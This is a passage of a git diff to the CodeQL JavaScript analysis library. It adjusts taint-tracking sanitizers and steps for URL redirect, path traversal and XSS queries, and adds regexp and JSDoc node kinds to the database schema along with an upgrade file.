- .getUnknownMember() + .getArrayElement() .getAMember() .getAParameter() .getPromised() .getReturn() .getParameter(2) - .getUnknownMember() .getInstance() .getReceiver() .getForwardingFunction() diff --git a/javascript/ql/lib/semmle/javascript/internal/flow_summaries/Arrays.qll b/javascript/ql/lib/semmle/javascript/internal/flow_summaries/Arrays.qll index d9f0836d739d..00fed9c4f093 100644 --- a/javascript/ql/lib/semmle/javascript/internal/flow_summaries/Arrays.qll +++ b/javascript/ql/lib/semmle/javascript/internal/flow_summaries/Arrays.qll @@ -96,7 +96,8 @@ class ArrayConstructorSummary extends SummarizedCallable { ArrayConstructorSummary() { this = "Array constructor" } override DataFlow::InvokeNode getACallSimple() { - result = arrayConstructorRef().getAnInvocation() + result = arrayConstructorRef().getAnInvocation() and + result.getNumArgument() > 1 } override predicate propagatesFlow(string input, string output, boolean preservesValue) { diff --git a/javascript/ql/lib/semmle/javascript/security/dataflow/ExternalAPIUsedWithUntrustedDataCustomizations.qll b/javascript/ql/lib/semmle/javascript/security/dataflow/ExternalAPIUsedWithUntrustedDataCustomizations.qll index 72fdafaad501..7a6575f86475 100644 --- a/javascript/ql/lib/semmle/javascript/security/dataflow/ExternalAPIUsedWithUntrustedDataCustomizations.qll +++ b/javascript/ql/lib/semmle/javascript/security/dataflow/ExternalAPIUsedWithUntrustedDataCustomizations.qll @@ -179,7 +179,6 @@ module ExternalApiUsedWithUntrustedData { or exists(string member | node = base.getMember(member) and - not node = base.getUnknownMember() and not isNumericString(member) and not (member = "default" and base = API::moduleImport(_)) and not member = "then" // use the 'promised' edges for .then callbacks @@ -189,10 +188,7 @@ module ExternalApiUsedWithUntrustedData { else result = basename + "['" + member.regexpReplaceAll("'", "\\'") + "']" ) or - ( - node = base.getUnknownMember() or - node = base.getMember(any(string s | isNumericString(s))) - ) and + node = base.getArrayElement() and result = basename + "[]" or // just collapse promises diff --git a/javascript/ql/lib/semmle/javascript/security/dataflow/ServerSideUrlRedirectQuery.qll b/javascript/ql/lib/semmle/javascript/security/dataflow/ServerSideUrlRedirectQuery.qll index e889480b48b7..e6c3345b2c7e 100644 --- a/javascript/ql/lib/semmle/javascript/security/dataflow/ServerSideUrlRedirectQuery.qll +++ b/javascript/ql/lib/semmle/javascript/security/dataflow/ServerSideUrlRedirectQuery.qll @@ -20,7 +20,11 @@ module ServerSideUrlRedirectConfig implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { sink instanceof Sink } - predicate isBarrier(DataFlow::Node node) { node instanceof Sanitizer } + predicate isBarrier(DataFlow::Node node) { + node instanceof Sanitizer + or + node = HostnameSanitizerGuard::getABarrierNode() + } predicate isBarrierOut(DataFlow::Node node) { hostnameSanitizingPrefixEdge(node, _) } @@ -69,10 +73,12 @@ deprecated class Configuration extends TaintTracking::Configuration { } /** + * DEPRECATED. This is no longer used as a sanitizer guard. + * * A call to a function called `isLocalUrl` or similar, which is * considered to sanitize a variable for purposes of URL redirection. */ -class LocalUrlSanitizingGuard extends DataFlow::CallNode { +deprecated class LocalUrlSanitizingGuard extends DataFlow::CallNode { LocalUrlSanitizingGuard() { this.getCalleeName().regexpMatch("(?i)(is_?)?local_?url") } /** DEPRECATED. Use `blocksExpr` instead. */ diff --git a/javascript/ql/lib/semmle/javascript/security/dataflow/TaintedPathCustomizations.qll b/javascript/ql/lib/semmle/javascript/security/dataflow/TaintedPathCustomizations.qll index dc23b895a4f6..f863b86a3b57 100644 --- a/javascript/ql/lib/semmle/javascript/security/dataflow/TaintedPathCustomizations.qll +++ b/javascript/ql/lib/semmle/javascript/security/dataflow/TaintedPathCustomizations.qll @@ -892,7 +892,13 @@ module TaintedPath { TaintTracking::uriStep(node1, node2) or exists(DataFlow::CallNode decode | - decode.getCalleeName() = "decodeURIComponent" or decode.getCalleeName() = "decodeURI" + decode = + DataFlow::globalVarRef([ + "decodeURIComponent", + "decodeURI", + "escape", + "unescape" + ]).getACall() | node1 = decode.getArgument(0) and node2 = decode diff --git a/javascript/ql/lib/semmle/javascript/security/dataflow/Xss.qll b/javascript/ql/lib/semmle/javascript/security/dataflow/Xss.qll index 0d17c9d84943..41487b8c3b64 100644 --- a/javascript/ql/lib/semmle/javascript/security/dataflow/Xss.qll +++ b/javascript/ql/lib/semmle/javascript/security/dataflow/Xss.qll @@ -53,7 +53,7 @@ module Shared { class UriEncodingSanitizer extends Sanitizer, DataFlow::CallNode { UriEncodingSanitizer() { exists(string name | this = DataFlow::globalVarRef(name).getACall() | - name = "encodeURI" or name = "encodeURIComponent" + name in ["encodeURI", "encodeURIComponent", "escape"] ) } } diff --git a/javascript/ql/lib/semmlecode.javascript.dbscheme b/javascript/ql/lib/semmlecode.javascript.dbscheme index c88c69174bd0..ccefb5e2d493 100644 --- a/javascript/ql/lib/semmlecode.javascript.dbscheme +++ b/javascript/ql/lib/semmlecode.javascript.dbscheme @@ -859,7 +859,10 @@ case @regexpterm.kind of | 24 = @regexp_char_range | 25 = @regexp_positive_lookbehind | 26 = @regexp_negative_lookbehind -| 27 = @regexp_unicode_property_escape; +| 27 = @regexp_unicode_property_escape +| 28 = @regexp_quoted_string +| 29 = @regexp_intersection +| 30 = @regexp_subtraction; regexp_parse_errors (unique int id: @regexp_parse_error, int regexp: @regexpterm ref, @@ -998,7 +1001,7 @@ case @jsdoc_type_expr.kind of | 2 = @jsdoc_undefined_type_expr | 3 = @jsdoc_unknown_type_expr | 4 = @jsdoc_void_type_expr -| 5 = @jsdoc_named_type_expr +| 5 = @jsdoc_identifier_type_expr | 6 = @jsdoc_applied_type_expr | 7 = @jsdoc_nullable_type_expr | 8 = @jsdoc_non_nullable_type_expr @@ -1008,6 +1011,7 @@ case @jsdoc_type_expr.kind of | 12 = @jsdoc_function_type_expr | 13 = @jsdoc_optional_type_expr | 14 = @jsdoc_rest_type_expr +| 15 = @jsdoc_qualified_type_expr ; #keyset[id, idx] diff --git a/javascript/ql/lib/semmlecode.javascript.dbscheme.stats b/javascript/ql/lib/semmlecode.javascript.dbscheme.stats index 97ba6f9bcc36..51889bd9286f 100644 --- a/javascript/ql/lib/semmlecode.javascript.dbscheme.stats +++ b/javascript/ql/lib/semmlecode.javascript.dbscheme.stats @@ -1194,6 +1194,18 @@ 12 +@regexp_quoted_string +12 + + +@regexp_intersection +12 + + +@regexp_subtraction +12 + + @regexp_parse_error 122 @@ -1322,10 +1334,14 @@ 8 -@jsdoc_named_type_expr +@jsdoc_identifier_type_expr 18639 +@jsdoc_qualified_type_expr +1000 + + @jsdoc_applied_type_expr 303 diff --git a/javascript/ql/lib/upgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/old.dbscheme b/javascript/ql/lib/upgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/old.dbscheme new file mode 100644 index 000000000000..5b5db607d20c --- /dev/null +++ b/javascript/ql/lib/upgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/old.dbscheme @@ -0,0 +1,1193 @@ +/*** Standard fragments ***/ + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- JavaScript-specific part -*/ + +@location = @location_default + +@sourceline = @locatable; + +filetype( + int file: @file ref, + string filetype: string ref +) + +// top-level code fragments +toplevels (unique int id: @toplevel, + int kind: int ref); + +is_externs (int toplevel: @toplevel ref); + +case @toplevel.kind of + 0 = @script +| 1 = @inline_script +| 2 = @event_handler +| 3 = @javascript_url +| 4 = @template_toplevel; + +is_module (int tl: @toplevel ref); +is_nodejs (int tl: @toplevel ref); +is_es2015_module (int tl: @toplevel ref); +is_closure_module (int tl: @toplevel ref); + +@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; +toplevel_parent_xml_node( + unique int toplevel: @toplevel ref, + int xmlnode: @xml_node_with_code ref); + +xml_element_parent_expression( + unique int xmlnode: @xmlelement ref, + int expression: @expr ref, + int index: int ref); + +// statements +#keyset[parent, idx] +stmts (unique int id: @stmt, + int kind: int ref, + int parent: @stmt_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +stmt_containers (unique int stmt: @stmt ref, + int container: @stmt_container ref); + +jump_targets (unique int jump: @stmt ref, + int target: @stmt ref); + +@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; +@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; + +case @stmt.kind of + 0 = @empty_stmt +| 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @labeled_stmt +| 5 = @break_stmt +| 6 = @continue_stmt +| 7 = @with_stmt +| 8 = @switch_stmt +| 9 = @return_stmt +| 10 = @throw_stmt +| 11 = @try_stmt +| 12 = @while_stmt +| 13 = @do_while_stmt +| 14 = @for_stmt +| 15 = @for_in_stmt +| 16 = @debugger_stmt +| 17 = @function_decl_stmt +| 18 = @var_decl_stmt +| 19 = @case +| 20 = @catch_clause +| 21 = @for_of_stmt +| 22 = @const_decl_stmt +| 23 = @let_stmt +| 24 = @legacy_let_stmt +| 25 = @for_each_stmt +| 26 = @class_decl_stmt +| 27 = @import_declaration +| 28 = @export_all_declaration +| 29 = @export_default_declaration +| 30 = @export_named_declaration +| 31 = @namespace_declaration +| 32 = @import_equals_declaration +| 33 = @export_assign_declaration +| 34 = @interface_declaration +| 35 = @type_alias_declaration +| 36 = @enum_declaration +| 37 = @external_module_declaration +| 38 = @export_as_namespace_declaration +| 39 = @global_augmentation_declaration +| 40 = @using_decl_stmt +; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; + +@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; + +@namespace_definition = @namespace_declaration | @enum_declaration; +@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; + +is_instantiated(unique int decl: @namespace_declaration ref); + +@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; +has_declare_keyword(unique int stmt: @declarable_node ref); + +is_for_await_of(unique int forof: @for_of_stmt ref); + +// expressions +#keyset[parent, idx] +exprs (unique int id: @expr, + int kind: int ref, + int parent: @expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @expr_or_type ref); + +enclosing_stmt (unique int expr: @expr_or_type ref, + int stmt: @stmt ref); + +expr_containers (unique int expr: @expr_or_type ref, + int container: @stmt_container ref); + +array_size (unique int ae: @arraylike ref, + int sz: int ref); + +is_delegating (int yield: @yield_expr ref); + +@expr_or_stmt = @expr | @stmt; +@expr_or_type = @expr | @typeexpr; +@expr_parent = @expr_or_stmt | @property | @function_typeexpr; +@arraylike = @array_expr | @array_pattern; +@type_annotation = @typeexpr | @jsdoc_type_expr; +@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; + +case @expr.kind of + 0 = @label +| 1 = @null_literal +| 2 = @boolean_literal +| 3 = @number_literal +| 4 = @string_literal +| 5 = @regexp_literal +| 6 = @this_expr +| 7 = @array_expr +| 8 = @obj_expr +| 9 = @function_expr +| 10 = @seq_expr +| 11 = @conditional_expr +| 12 = @new_expr +| 13 = @call_expr +| 14 = @dot_expr +| 15 = @index_expr +| 16 = @neg_expr +| 17 = @plus_expr +| 18 = @log_not_expr +| 19 = @bit_not_expr +| 20 = @typeof_expr +| 21 = @void_expr +| 22 = @delete_expr +| 23 = @eq_expr +| 24 = @neq_expr +| 25 = @eqq_expr +| 26 = @neqq_expr +| 27 = @lt_expr +| 28 = @le_expr +| 29 = @gt_expr +| 30 = @ge_expr +| 31 = @lshift_expr +| 32 = @rshift_expr +| 33 = @urshift_expr +| 34 = @add_expr +| 35 = @sub_expr +| 36 = @mul_expr +| 37 = @div_expr +| 38 = @mod_expr +| 39 = @bitor_expr +| 40 = @xor_expr +| 41 = @bitand_expr +| 42 = @in_expr +| 43 = @instanceof_expr +| 44 = @logand_expr +| 45 = @logor_expr +| 47 = @assign_expr +| 48 = @assign_add_expr +| 49 = @assign_sub_expr +| 50 = @assign_mul_expr +| 51 = @assign_div_expr +| 52 = @assign_mod_expr +| 53 = @assign_lshift_expr +| 54 = @assign_rshift_expr +| 55 = @assign_urshift_expr +| 56 = @assign_or_expr +| 57 = @assign_xor_expr +| 58 = @assign_and_expr +| 59 = @preinc_expr +| 60 = @postinc_expr +| 61 = @predec_expr +| 62 = @postdec_expr +| 63 = @par_expr +| 64 = @var_declarator +| 65 = @arrow_function_expr +| 66 = @spread_element +| 67 = @array_pattern +| 68 = @object_pattern +| 69 = @yield_expr +| 70 = @tagged_template_expr +| 71 = @template_literal +| 72 = @template_element +| 73 = @array_comprehension_expr +| 74 = @generator_expr +| 75 = @for_in_comprehension_block +| 76 = @for_of_comprehension_block +| 77 = @legacy_letexpr +| 78 = @var_decl +| 79 = @proper_varaccess +| 80 = @class_expr +| 81 = @super_expr +| 82 = @newtarget_expr +| 83 = @named_import_specifier +| 84 = @import_default_specifier +| 85 = @import_namespace_specifier +| 86 = @named_export_specifier +| 87 = @exp_expr +| 88 = @assign_exp_expr +| 89 = @jsx_element +| 90 = @jsx_qualified_name +| 91 = @jsx_empty_expr +| 92 = @await_expr +| 93 = @function_sent_expr +| 94 = @decorator +| 95 = @export_default_specifier +| 96 = @export_namespace_specifier +| 97 = @bind_expr +| 98 = @external_module_reference +| 99 = @dynamic_import +| 100 = @expression_with_type_arguments +| 101 = @prefix_type_assertion +| 102 = @as_type_assertion +| 103 = @export_varaccess +| 104 = @decorator_list +| 105 = @non_null_assertion +| 106 = @bigint_literal +| 107 = @nullishcoalescing_expr +| 108 = @e4x_xml_anyname +| 109 = @e4x_xml_static_attribute_selector +| 110 = @e4x_xml_dynamic_attribute_selector +| 111 = @e4x_xml_filter_expression +| 112 = @e4x_xml_static_qualident +| 113 = @e4x_xml_dynamic_qualident +| 114 = @e4x_xml_dotdotexpr +| 115 = @import_meta_expr +| 116 = @assignlogandexpr +| 117 = @assignlogorexpr +| 118 = @assignnullishcoalescingexpr +| 119 = @template_pipe_ref +| 120 = @generated_code_expr +| 121 = @satisfies_expr +; + +@varaccess = @proper_varaccess | @export_varaccess; +@varref = @var_decl | @varaccess; + +@identifier = @label | @varref | @type_identifier; + +@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; + +@propaccess = @dot_expr | @index_expr; + +@invokeexpr = @new_expr | @call_expr; + +@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; + +@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; + +@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; + +@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | @mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; + +@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; + +@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; + +@pattern = @varref | @array_pattern | @object_pattern; + +@comprehension_expr = @array_comprehension_expr | @generator_expr; + +@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; + +@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; + +@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; + +@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; + +@type_assertion = @as_type_assertion | @prefix_type_assertion; + +@class_definition = @class_decl_stmt | @class_expr; +@interface_definition = @interface_declaration | @interface_typeexpr; +@class_or_interface = @class_definition | @interface_definition; + +@lexical_decl = @var_decl | @type_decl; +@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; +@lexical_ref = @lexical_decl | @lexical_access; + +@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; +@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; + +expr_contains_template_tag_location( + int expr: @expr ref, + int location: @location ref +); + +@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; + +template_placeholder_tag_info( + unique int node: @template_placeholder_tag, + int parentNode: @template_placeholder_tag_parent ref, + varchar(900) raw: string ref +); + +// scopes +scopes (unique int id: @scope, + int kind: int ref); + +case @scope.kind of + 0 = @global_scope +| 1 = @function_scope +| 2 = @catch_scope +| 3 = @module_scope +| 4 = @block_scope +| 5 = @for_scope +| 6 = @for_in_scope // for-of scopes work the same as for-in scopes +| 7 = @comprehension_block_scope +| 8 = @class_expr_scope +| 9 = @namespace_scope +| 10 = @class_decl_scope +| 11 = @interface_scope +| 12 = @type_alias_scope +| 13 = @mapped_type_scope +| 14 = @enum_scope +| 15 = @external_module_scope +| 16 = @conditional_type_scope; + +scopenodes (unique int node: @ast_node ref, + int scope: @scope ref); + +scopenesting (unique int inner: @scope ref, + int outer: @scope ref); + +// functions +@function = @function_decl_stmt | @function_expr | @arrow_function_expr; + +@parameterized = @function | @catch_clause; +@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; + +is_generator (int fun: @function ref); +has_rest_parameter (int fun: @function ref); +is_async (int fun: @function ref); + +// variables and lexically scoped type names +#keyset[scope, name] +variables (unique int id: @variable, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_type_names (unique int id: @local_type_name, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_namespace_names (unique int id: @local_namespace_name, + varchar(900) name: string ref, + int scope: @scope ref); + +is_arguments_object (int id: @variable ref); + +@lexical_name = @variable | @local_type_name | @local_namespace_name; + +@bind_id = @varaccess | @local_var_type_access; +bind (unique int id: @bind_id ref, + int decl: @variable ref); + +decl (unique int id: @var_decl ref, + int decl: @variable ref); + +@typebind_id = @local_type_access | @export_varaccess; +typebind (unique int id: @typebind_id ref, + int decl: @local_type_name ref); + +@typedecl_id = @type_decl | @var_decl; +typedecl (unique int id: @typedecl_id ref, + int decl: @local_type_name ref); + +namespacedecl (unique int id: @var_decl ref, + int decl: @local_namespace_name ref); + +@namespacebind_id = @local_namespace_access | @export_varaccess; +namespacebind (unique int id: @namespacebind_id ref, + int decl: @local_namespace_name ref); + + +// properties in object literals, property patterns in object patterns, and method declarations in classes +#keyset[parent, index] +properties (unique int id: @property, + int parent: @property_parent ref, + int index: int ref, + int kind: int ref, + varchar(900) tostring: string ref); + +case @property.kind of + 0 = @value_property +| 1 = @property_getter +| 2 = @property_setter +| 3 = @jsx_attribute +| 4 = @function_call_signature +| 5 = @constructor_call_signature +| 6 = @index_signature +| 7 = @enum_member +| 8 = @proper_field +| 9 = @parameter_field +| 10 = @static_initializer +; + +@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; +@property_accessor = @property_getter | @property_setter; +@call_signature = @function_call_signature | @constructor_call_signature; +@field = @proper_field | @parameter_field; +@field_or_vardeclarator = @field | @var_declarator; + +is_computed (int id: @property ref); +is_method (int id: @property ref); +is_static (int id: @property ref); +is_abstract_member (int id: @property ref); +is_const_enum (int id: @enum_declaration ref); +is_abstract_class (int id: @class_decl_stmt ref); + +has_public_keyword (int id: @property ref); +has_private_keyword (int id: @property ref); +has_protected_keyword (int id: @property ref); +has_readonly_keyword (int id: @property ref); +has_type_keyword (int id: @type_keyword_operand ref); +is_optional_member (int id: @property ref); +has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); +is_optional_parameter_declaration (unique int parameter: @pattern ref); + +#keyset[constructor, param_index] +parameter_fields( + unique int field: @parameter_field ref, + int constructor: @function_expr ref, + int param_index: int ref +); + +// types +#keyset[parent, idx] +typeexprs ( + unique int id: @typeexpr, + int kind: int ref, + int parent: @typeexpr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref +); + +case @typeexpr.kind of + 0 = @local_type_access +| 1 = @type_decl +| 2 = @keyword_typeexpr +| 3 = @string_literal_typeexpr +| 4 = @number_literal_typeexpr +| 5 = @boolean_literal_typeexpr +| 6 = @array_typeexpr +| 7 = @union_typeexpr +| 8 = @indexed_access_typeexpr +| 9 = @intersection_typeexpr +| 10 = @parenthesized_typeexpr +| 11 = @tuple_typeexpr +| 12 = @keyof_typeexpr +| 13 = @qualified_type_access +| 14 = @generic_typeexpr +| 15 = @type_label +| 16 = @typeof_typeexpr +| 17 = @local_var_type_access +| 18 = @qualified_var_type_access +| 19 = @this_var_type_access +| 20 = @predicate_typeexpr +| 21 = @interface_typeexpr +| 22 = @type_parameter +| 23 = @plain_function_typeexpr +| 24 = @constructor_typeexpr +| 25 = @local_namespace_access +| 26 = @qualified_namespace_access +| 27 = @mapped_typeexpr +| 28 = @conditional_typeexpr +| 29 = @infer_typeexpr +| 30 = @import_type_access +| 31 = @import_namespace_access +| 32 = @import_var_type_access +| 33 = @optional_typeexpr +| 34 = @rest_typeexpr +| 35 = @bigint_literal_typeexpr +| 36 = @readonly_typeexpr +| 37 = @template_literal_typeexpr +; + +@typeref = @typeaccess | @type_decl; +@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; +@typeexpr_parent = @expr | @stmt | @property | @typeexpr; +@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; +@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; +@vartypeaccess = @local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; +@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; +@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; + +@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; + +// types +types ( + unique int id: @type, + int kind: int ref, + varchar(900) tostring: string ref +); + +#keyset[parent, idx] +type_child ( + int child: @type ref, + int parent: @type ref, + int idx: int ref +); + +case @type.kind of + 0 = @any_type +| 1 = @string_type +| 2 = @number_type +| 3 = @union_type +| 4 = @true_type +| 5 = @false_type +| 6 = @type_reference +| 7 = @object_type +| 8 = @canonical_type_variable_type +| 9 = @typeof_type +| 10 = @void_type +| 11 = @undefined_type +| 12 = @null_type +| 13 = @never_type +| 14 = @plain_symbol_type +| 15 = @unique_symbol_type +| 16 = @objectkeyword_type +| 17 = @intersection_type +| 18 = @tuple_type +| 19 = @lexical_type_variable_type +| 20 = @this_type +| 21 = @number_literal_type +| 22 = @string_literal_type +| 23 = @unknown_type +| 24 = @bigint_type +| 25 = @bigint_literal_type +; + +@boolean_literal_type = @true_type | @false_type; +@symbol_type = @plain_symbol_type | @unique_symbol_type; +@union_or_intersection_type = @union_type | @intersection_type; +@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; + +has_asserts_keyword(int node: @predicate_typeexpr ref); + +@typed_ast_node = @expr | @typeexpr | @function; +ast_node_type( + unique int node: @typed_ast_node ref, + int typ: @type ref); + +declared_function_signature( + unique int node: @function ref, + int sig: @signature_type ref +); + +invoke_expr_signature( + unique int node: @invokeexpr ref, + int sig: @signature_type ref +); + +invoke_expr_overload_index( + unique int node: @invokeexpr ref, + int index: int ref +); + +symbols ( + unique int id: @symbol, + int kind: int ref, + varchar(900) name: string ref +); + +symbol_parent ( + unique int symbol: @symbol ref, + int parent: @symbol ref +); + +symbol_module ( + int symbol: @symbol ref, + varchar(900) moduleName: string ref +); + +symbol_global ( + int symbol: @symbol ref, + varchar(900) globalName: string ref +); + +case @symbol.kind of + 0 = @root_symbol +| 1 = @member_symbol +| 2 = @other_symbol +; + +@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; +@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; + +ast_node_symbol( + unique int node: @ast_node_with_symbol ref, + int symbol: @symbol ref); + +type_symbol( + unique int typ: @type_with_symbol ref, + int symbol: @symbol ref); + +#keyset[typ, name] +type_property( + int typ: @type ref, + varchar(900) name: string ref, + int propertyType: @type ref); + +type_alias( + unique int aliasType: @type ref, + int underlyingType: @type ref); + +@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; +@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; +type_literal_value( + unique int typ: @type_with_literal_value ref, + varchar(900) value: string ref); + +signature_types ( + unique int id: @signature_type, + int kind: int ref, + varchar(900) tostring: string ref, + int type_parameters: int ref, + int required_params: int ref +); + +is_abstract_signature( + unique int sig: @signature_type ref +); + +signature_rest_parameter( + unique int sig: @signature_type ref, + int rest_param_arra_type: @type ref +); + +case @signature_type.kind of + 0 = @function_signature_type +| 1 = @constructor_signature_type +; + +#keyset[typ, kind, index] +type_contains_signature ( + int typ: @type ref, + int kind: int ref, // constructor/call/index + int index: int ref, // ordering of overloaded signatures + int sig: @signature_type ref +); + +#keyset[parent, index] +signature_contains_type ( + int child: @type ref, + int parent: @signature_type ref, + int index: int ref +); + +#keyset[sig, index] +signature_parameter_name ( + int sig: @signature_type ref, + int index: int ref, + varchar(900) name: string ref +); + +number_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +string_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +base_type_names( + int typeName: @symbol ref, + int baseTypeName: @symbol ref +); + +self_types( + int typeName: @symbol ref, + int selfType: @type_reference ref +); + +tuple_type_min_length( + unique int typ: @type ref, + int minLength: int ref +); + +tuple_type_rest_index( + unique int typ: @type ref, + int index: int ref +); + +// comments +comments (unique int id: @comment, + int kind: int ref, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(900) tostring: string ref); + +case @comment.kind of + 0 = @slashslash_comment +| 1 = @slashstar_comment +| 2 = @doc_comment +| 3 = @html_comment_start +| 4 = @htmlcommentend; + +@html_comment = @html_comment_start | @htmlcommentend; +@line_comment = @slashslash_comment | @html_comment; +@block_comment = @slashstar_comment | @doc_comment; + +// source lines +lines (unique int id: @line, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(2) terminator: string ref); +indentation (int file: @file ref, + int lineno: int ref, + varchar(1) indentChar: string ref, + int indentDepth: int ref); + +// JavaScript parse errors +js_parse_errors (unique int id: @js_parse_error, + int toplevel: @toplevel ref, + varchar(900) message: string ref, + varchar(900) line: string ref); + +// regular expressions +#keyset[parent, idx] +regexpterm (unique int id: @regexpterm, + int kind: int ref, + int parent: @regexpparent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; + +case @regexpterm.kind of + 0 = @regexp_alt +| 1 = @regexp_seq +| 2 = @regexp_caret +| 3 = @regexp_dollar +| 4 = @regexp_wordboundary +| 5 = @regexp_nonwordboundary +| 6 = @regexp_positive_lookahead +| 7 = @regexp_negative_lookahead +| 8 = @regexp_star +| 9 = @regexp_plus +| 10 = @regexp_opt +| 11 = @regexp_range +| 12 = @regexp_dot +| 13 = @regexp_group +| 14 = @regexp_normal_constant +| 15 = @regexp_hex_escape +| 16 = @regexp_unicode_escape +| 17 = @regexp_dec_escape +| 18 = @regexp_oct_escape +| 19 = @regexp_ctrl_escape +| 20 = @regexp_char_class_escape +| 21 = @regexp_id_escape +| 22 = @regexp_backref +| 23 = @regexp_char_class +| 24 = @regexp_char_range +| 25 = @regexp_positive_lookbehind +| 26 = @regexp_negative_lookbehind +| 27 = @regexp_unicode_property_escape +| 28 = @regexp_quoted_string +| 29 = @regexp_intersection +| 30 = @regexp_subtraction; + +regexp_parse_errors (unique int id: @regexp_parse_error, + int regexp: @regexpterm ref, + varchar(900) message: string ref); + +@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; +@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; +@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; +@regexp_constant = @regexp_normal_constant | @regexp_char_escape; +@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; +@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; +@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; +@regexp_anchor = @regexp_dollar | 